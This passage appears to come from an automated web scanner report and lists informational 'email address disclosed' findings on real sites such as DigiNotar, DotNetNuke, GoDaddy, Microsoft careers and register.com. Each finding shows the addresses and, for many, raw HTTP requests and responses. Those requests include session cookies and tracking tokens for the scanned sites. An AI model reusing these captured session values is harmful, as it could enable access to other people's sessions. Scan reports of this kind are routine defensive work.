The following email address was disclosed in the response:

jhenning@solpart.com

Request

GET /controls/SolpartMenu/spmenu.js HTTP/1.1
Host: www.diginotar.nl
Proxy-Connection: keep-alive
Referer: http://www.diginotar.nl/Aanvragen/Lopendeprojecten/DienstenloketBerichtenbox/tabid/1448/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=73892103.1325282259.1315085212.1315085212.1315085212.1; __utmb=73892103.2.10.1315085212; __utmc=73892103; __utmz=73892103.1315085212.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); .ASPXANONYMOUS=nIw0DxKhzAEkAAAAMmQwMTQyZmEtYmQwNS00ZWNmLThiMGUtNTUwMDYwOTNiNDkw0; language=nl-NL

Response

HTTP/1.1 200 OK
Content-Length: 67819
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 05:53:52 GMT
Accept-Ranges: bytes
ETag: "018cc458e29cc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:27:10 GMT

//------------------------------------------------------//
// Solution Partner's ASP.NET Hierarchical Menu Control //
// Copyright (c) 2002-2005 //
// Jon Henning - Solution Partner's Inc //
// jhenning@solpart.com - http://www.solpart.com //
// Compatible Menu Version: <Min: 1400>
...[SNIP]...
tion spm_stopEventBubbling(e)
{
if (spm_browserType() == 'ie')
           window.event.cancelBubble = true;
       else
           e.stopPropagation();
}

//--- if you have a better solution send me an email - jhenning@solpart.com ---//
function spm_appendFunction(from_func, to_func)
{
if (from_func == null)
return new Function ( to_func );
return new Function ( spm_parseFunctionContents(from_func) + '\n' + spm_pa
...[SNIP]...

21.93. http://www.dnncreative.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dnncreative.com
Path:	/Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

nik.kalyani@dotnetnuke.com

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js HTTP/1.1
Host: www.dnncreative.com
Proxy-Connection: keep-alive
Referer: http://www.dnncreative.com/DotNetNukeandHttpCompression/tabid/154/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=mEeFfdygzAEkAAAANmJlMWY2YTgtOGRlNy00NDRmLWFhOTktOTFkNTg5YWZlNzMz0; language=en-US; __utma=178346609.897823162.1315062353.1315062353.1315062353.1; __utmb=178346609.1.10.1315062353; __utmc=178346609; __utmz=178346609.1315062353.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=compression%20dotnetnuke

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 13 Aug 2011 10:51:41 GMT
Accept-Ranges: bytes
ETag: "5cb529fca659cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 15:03:40 GMT
Content-Length: 10101

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...

21.94. http://www.dnncreative.com/Resources/Shared/scripts/widgets.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dnncreative.com
Path:	/Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

nik.kalyani@dotnetnuke.com

Request

GET /Resources/Shared/scripts/widgets.js HTTP/1.1
Host: www.dnncreative.com
Proxy-Connection: keep-alive
Referer: http://www.dnncreative.com/DotNetNukeandHttpCompression/tabid/154/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=mEeFfdygzAEkAAAANmJlMWY2YTgtOGRlNy00NDRmLWFhOTktOTFkNTg5YWZlNzMz0; language=en-US; __utma=178346609.897823162.1315062353.1315062353.1315062353.1; __utmb=178346609.1.10.1315062353; __utmc=178346609; __utmz=178346609.1315062353.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=compression%20dotnetnuke

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 13 Aug 2011 10:51:43 GMT
Accept-Ranges: bytes
ETag: "f45851fda659cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 15:03:41 GMT
Content-Length: 11495

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...

21.95. http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dotnetnuke.com
Path:	/News/Press-Releases/HTTP-Compression-Module.aspx

Issue detail

The following email address was disclosed in the response:

sales@dnncorp.com

Request

Response

21.96. http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dotnetnuke.com
Path:	/Resources/Wiki/page/Compression.aspx

Issue detail

The following email address was disclosed in the response:

sales@dnncorp.com

Request

Response

21.97. http://www.godaddy.com/Payment/payment-options.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/Payment/payment-options.aspx

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com

Request

Response

21.98. http://www.godaddy.com/affiliates/affiliate-program.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/affiliates/affiliate-program.aspx

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:25:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:25:55 GMT
Content-Length: 98753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...

21.99. http://www.godaddy.com/gdshop/offers/cross_sell.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/gdshop/offers/cross_sell.asp

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com
support@godaddy.com

Request

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response

21.100. http://www.godaddy.com/ssl/ssl-certificates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/ssl/ssl-certificates.aspx

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:28:59 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=ci=8346&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=wgegihwbqjtcqjfhsblalayejedfpbid; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:28:59 GMT
Content-Length: 133386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...

21.101. http://www.hostnj.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostnj.net
Path:	/

Issue detail

The following email address was disclosed in the response:

sales@proadvanced.com

Request

Response

21.102. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostnj.net
Path:	/products-page/ssl-security/comodo-intranet-ssl-certificate/

Issue detail

The following email address was disclosed in the response:

sales@proadvanced.com

Request

Response

21.103. http://www.hostnj.net/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostnj.net
Path:	/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js?ver=1.3.8 HTTP/1.1
Host: www.hostnj.net
Proxy-Connection: keep-alive
Referer: http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0c4jdvo08lk3se1ijpreg0j3o3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 13 Aug 2011 11:07:36 GMT
Accept-Ranges: bytes
ETag: "30ed7c35a959cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:35:11 GMT
Content-Length: 9763

// ColorBox v1.3.17.2 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function bc(b){if(!U){P=b,_(),y=a(P),Q=0,K.rel!=="nofollow"&&(y=a("."+g).filter(function(){var
...[SNIP]...

21.104. http://www.microsoft-careers.com/find.job previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/find.job

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

GET /find.job HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.105. http://www.microsoft-careers.com/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.106. http://www.microsoft-careers.com/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.107. http://www.microsoft-careers.com/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.108. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.109. http://www.microsoft-careers.com/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.110. http://www.microsoft-careers.com/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.111. http://www.microsoft-careers.com/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.112. http://www.microsoft-careers.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft-careers.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.113. https://www.microsoft-careers.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:10:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<a title="Click here to send feedback about this site" href="mailto:feedback-microsoft@jobs2web.com?subject=Feedback%20on%20http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom">
...[SNIP]...

21.114. https://www.microsoft-careers.com/content/corporate-research/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/content/corporate-research/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:10:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<a title="Click here to send feedback about this site" href="mailto:feedback-microsoft@jobs2web.com?subject=Feedback%20on%20http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom">
...[SNIP]...

21.115. https://www.microsoft-careers.com/find.job previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/find.job

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

GET /find.job HTTP/1.1
Host: www.microsoft-careers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:28:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<a title="Click here to send feedback about this site" href="mailto:feedback-microsoft@jobs2web.com?subject=Feedback%20on%20http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom">
...[SNIP]...

21.116. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/go/Microsoft-Research-Jobs/217358/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.117. https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:14:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<
...[SNIP]...
<a title="Click here to send feedback about this site" href="mailto:feedback-microsoft@jobs2web.com?subject=Feedback%20on%20http%3A%2F%2Fwww%2Emicrosoft%2Dcareers%2Ecom">
...[SNIP]...

21.118. https://www.microsoft-careers.com/talentcommunity/subscribe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.microsoft-careers.com
Path:	/talentcommunity/subscribe/

Issue detail

The following email address was disclosed in the response:

feedback-microsoft@jobs2web.com

Request

Response

21.119. http://www.register.com/js/domain-taken.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/domain-taken.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /js/domain-taken.js HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:30:45 GMT
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:16 GMT
ETag: "1256c9-2985d-4aba017028200"
Accept-Ranges: bytes
Content-Length: 170077
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

21.120. http://www.register.com/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDF5A8C6D67410D617CC97B16A7B361F; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:13 GMT
ETag: "14b21d-1096-4aba016d4bb40"
Accept-Ranges: bytes
Content-Length: 4246
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=4d632488d63df192acaddb778076d1e434fb6f4d2b0d40564e629da2286023f20d60c5e2948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

21.121. https://www.sslmatrix.com/script/jquery.hoverIntent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/script/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /script/jquery.hoverIntent.js HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 04 Jul 2011 18:51:51 GMT
Accept-Ranges: bytes
ETag: "d2d1da6f7b3acc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:32:15 GMT
Content-Length: 1614

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

21.122. https://www.sslmatrix.com/script/jquery.jqGrid.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
